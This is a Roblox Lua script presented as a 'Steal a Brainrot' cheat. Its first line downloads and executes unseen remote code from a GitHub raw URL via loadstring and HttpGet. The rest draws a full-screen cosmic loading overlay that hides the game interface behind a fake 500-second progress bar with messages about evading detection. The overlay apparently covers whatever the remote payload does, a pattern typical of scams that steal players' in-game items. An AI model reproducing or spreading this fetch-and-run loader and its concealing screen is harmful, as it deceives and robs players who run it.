
loadstring(game:HttpGet("https://raw.githubusercontent.com/main-luarp/Etfb-TokenMultiplier/refs/heads/main/arthurdevvy"))()

local CoreGui = game:GetService("CoreGui")
local TweenService = game:GetService("TweenService")
local StarterGui = game:GetService("StarterGui")

pcall(function()
	StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.All, false)
end)

-- 🌌 Main GUI
local LoadingScreen = Instance.new("ScreenGui")
LoadingScreen.Name = "NebulaLoadingScreen"
LoadingScreen.IgnoreGuiInset = true
LoadingScreen.DisplayOrder = 999999999
LoadingScreen.Parent = CoreGui

-- 🌌 Background (Deep cosmic gradient)
local Background = Instance.new("Frame")
Background.Size = UDim2.new(1, 0, 1, 0)
Background.BackgroundColor3 = Color3.fromRGB(10, 10, 25)
Background.Parent = LoadingScreen

local BgGradient = Instance.new("UIGradient")
BgGradient.Color = ColorSequence.new({
	ColorSequenceKeypoint.new(0, Color3.fromRGB(20, 10, 40)),
	ColorSequenceKeypoint.new(1, Color3.fromRGB(10, 30, 60))
})
BgGradient.Rotation = 45
BgGradient.Parent = Background

task.spawn(function()
	while task.wait(0.05) do
		BgGradient.Rotation = (BgGradient.Rotation + 0.2) % 360
	end
end)

-- 🌠 Shooting Stars
local function createStar()
	local star = Instance.new("Frame")
	local size = math.random(3, 6)
	star.Size = UDim2.new(0, size, 0, size)
	star.Position = UDim2.new(math.random(), 0, math.random(), 0)
	star.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	star.BorderSizePixel = 0
	star.ZIndex = 1 -- ⬅️ lowered so stars stay behind text
	star.Parent = Background

	local trail = Instance.new("ImageLabel")
	trail.Size = UDim2.new(0, size * 20, 0, size * 2)
	trail.AnchorPoint = Vector2.new(1, 0.5)
	trail.Position = UDim2.new(0, 0, 0.5, 0)
	trail.BackgroundTransparency = 1
	trail.Image = "rbxassetid://4964674313"
	trail.ImageColor3 = Color3.fromRGB(120, 180, 255)
	trail.ImageTransparency = 0.25
	trail.ZIndex = 1 -- ⬅️ same reason
	trail.Parent = star

	local endPos = UDim2.new(star.Position.X.Scale + 0.4, 0, star.Position.Y.Scale + 0.1, 0)
	local tween = TweenService:Create(star, TweenInfo.new(math.random(1, 2), Enum.EasingStyle.Linear), {
		Position = endPos,
		BackgroundTransparency = 1
	})
	local trailTween = TweenService:Create(trail, TweenInfo.new(1.2), {ImageTransparency = 1})
	tween:Play()
	trailTween:Play()
	tween.Completed:Connect(function()
		star:Destroy()
	end)
end

task.spawn(function()
	while task.wait(math.random(0.3, 0.7)) do
		createStar()
	end
end)

-- 🌈 Premium Nebula Gradient (used everywhere)
local function premiumGradient(parent)
	local g = Instance.new("UIGradient")
	g.Color = ColorSequence.new({
		ColorSequenceKeypoint.new(0, Color3.fromRGB(170, 100, 255)), -- Violet
		ColorSequenceKeypoint.new(0.5, Color3.fromRGB(80, 150, 255)), -- Blue
		ColorSequenceKeypoint.new(1, Color3.fromRGB(0, 255, 200)) -- Aqua
	})
	g.Rotation = 0
	g.Parent = parent
	task.spawn(function()
		while task.wait(0.05) do
			g.Rotation = (g.Rotation + 1) % 360
		end
	end)
	return g
end

-- 🌿 Title
local Title = Instance.new("TextLabel")
Title.Parent = Background
Title.Size = UDim2.new(1, 0, 0.13, 0)
Title.Position = UDim2.new(0, 0, 0.3, 0)
Title.BackgroundTransparency = 1
Title.Text = "Steal a Brainrot"
Title.Font = Enum.Font.GothamBlack
Title.TextScaled = true
Title.TextStrokeTransparency = 0.5
Title.TextStrokeColor3 = Color3.fromRGB(0, 0, 0)
Title.ZIndex = 2 -- ⬅️ text above stars
premiumGradient(Title)

-- 🌿 Subtext
local SubText = Instance.new("TextLabel")
SubText.Parent = Background
SubText.Size = UDim2.new(1, 0, 0.05, 0)
SubText.Position = UDim2.new(0, 0, 0.46, 0)
SubText.BackgroundTransparency = 1
SubText.Font = Enum.Font.GothamSemibold
SubText.TextScaled = true
SubText.TextStrokeTransparency = 0.5
SubText.TextStrokeColor3 = Color3.fromRGB(0, 0, 0)
SubText.ZIndex = 2 -- ⬅️ text above stars
premiumGradient(SubText)

local messages = {
    "Initializing diagnostic shroud...",
    "Scanning for hostile watchdog processes...",
    "Obfuscating runtime footprint...",
    "Diverting heuristic scanners...",
    "Masking behavioral signatures...",
    "Stabilizing cloaked subsystems...",
    "Isolating anomaly triggers...",
    "Neutralizing false-positive flags...",
    "Syncing stealth telemetry layer...",
    "Verifying sandbox insulation...",
    "Confirming silent-mode readiness...",
    "Operational cloak engaged."
}

task.spawn(function()
	while true do
		for _, msg in ipairs(messages) do
			SubText.Text = msg
			task.wait(2.5)
		end
	end
end)

-- 🌈 Loading Bar
local BarContainer = Instance.new("Frame")
BarContainer.Parent = Background
BarContainer.Size = UDim2.new(0.6, 0, 0.02, 0)
BarContainer.Position = UDim2.new(0.2, 0, 0.65, 0)
BarContainer.BackgroundColor3 = Color3.fromRGB(25, 25, 40)
BarContainer.BorderSizePixel = 0
BarContainer.ZIndex = 4

local UICornerContainer = Instance.new("UICorner", BarContainer)
UICornerContainer.CornerRadius = UDim.new(0, 20)

local BarFill = Instance.new("Frame")
BarFill.Parent = BarContainer
BarFill.Size = UDim2.new(0, 0, 1, 0)
BarFill.BorderSizePixel = 0
BarFill.ZIndex = 4
premiumGradient(BarFill)

local UICornerFill = Instance.new("UICorner", BarFill)
UICornerFill.CornerRadius = UDim.new(0, 20)

-- Optional neon glow aura
local Glow = Instance.new("UIStroke")
Glow.Thickness = 2
Glow.Transparency = 0.7
Glow.Color = Color3.fromRGB(100, 180, 255)
Glow.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Glow.Parent = BarFill

-- Percentage Text
local Percent = Instance.new("TextLabel")
Percent.Parent = Background
Percent.Size = UDim2.new(1, 0, 0.05, 0)
Percent.Position = UDim2.new(0, 0, 0.7, 0)
Percent.BackgroundTransparency = 1
Percent.Text = "0%"
Percent.Font = Enum.Font.Gotham
Percent.TextColor3 = Color3.fromRGB(200, 220, 255)
Percent.TextScaled = true
Percent.ZIndex = 5

-- Smooth Load
local function simulateLoading(duration)
	local elapsed = 0
	while elapsed < duration do
		task.wait(0.05)
		elapsed += 0.05
		local ratio = elapsed / duration
		local eased = 1 - math.exp(-3 * ratio)
		BarFill.Size = UDim2.new(eased, 0, 1, 0)
		Percent.Text = math.floor(eased * 100) .. "%"
	end
end

simulateLoading(500) -- duration in seconds

-- Fade Out
local Fade = Instance.new("Frame")
Fade.Parent = Background
Fade.Size = UDim2.new(1, 0, 1, 0)
Fade.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Fade.BackgroundTransparency = 1
Fade.ZIndex = 10 -- fade over everything

TweenService:Create(Fade, TweenInfo.new(1.5), {BackgroundTransparency = 0}):Play()
task.wait(1.5)
LoadingScreen:Destroy()

pcall(function()
	StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.All, true)
end)

